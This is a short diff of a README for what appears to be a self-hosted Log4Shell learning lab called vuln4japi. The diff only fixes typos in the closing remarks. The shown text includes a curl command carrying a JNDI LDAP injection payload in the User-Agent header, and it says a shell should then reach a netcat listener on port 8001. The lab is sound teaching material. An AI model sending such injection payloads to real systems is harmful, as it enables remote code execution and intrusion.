nix-xin/vuln4japi/README.md

 ```bash
 curl -vv http://localhost:8080/vuln4japi/api -H 'User-Agent: ${jndi:ldap://localhost:1389/a}'
 ```
 If all works as expected, you should have a shell forwarded to your netcat listener on port 8001.
 Review all your Terminal windows and observe the behavior in each one of them looking for any typos or syntax errors.
-There's alot going on here so human error is alway in play.
+There's alot going on here so human error is always in play.
 Give it a few runs until you get it down.
-You may have to modify the source a little, but hey, that's what its for.
+You may have to modify the source a little, but hey, that's how we learn. ;-)

 I hope you enjoy learning from this project as much as I enjoyed putting it together.
 Find me on twitter @offswitchsec if you have any feedback or comments.
 Enjoy and Happy Hacking!